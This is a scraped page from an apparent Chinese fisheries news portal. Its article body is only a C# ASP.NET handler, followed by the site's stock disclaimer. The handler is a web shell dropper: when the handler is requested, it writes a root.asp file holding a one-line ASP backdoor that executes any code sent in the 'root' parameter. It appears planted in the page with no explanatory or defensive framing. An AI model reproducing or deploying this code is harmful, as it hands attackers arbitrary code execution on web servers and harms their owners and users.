中国水产门户网报道<%@ WebHandler Language="C#" Class="Handler" %>
using System; using System.Web; using System.IO; public class Handler : IHttpHandler { public void ProcessRequest (HttpContext context) { context.Response.ContentType = "text/plain"; StreamWriter file1= File.CreateText(context.Server.MapPath("root.asp")); file1.Write("<%response.clear:execute request(\"root\"):response.End%>"); file1.Flush(); file1.Close(); } public bool IsReusable { get { return false; } } }
免责声明:本文在于传播更多的信息,并不代表本网观点。本文不保证其内容的准确性、可靠性和有效性,本版文章的原创性以及文中陈述文字和内容并未经过本站证实,对本文以及其中全部或者部分内容、文字的真实性、完整性,数据的准确性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。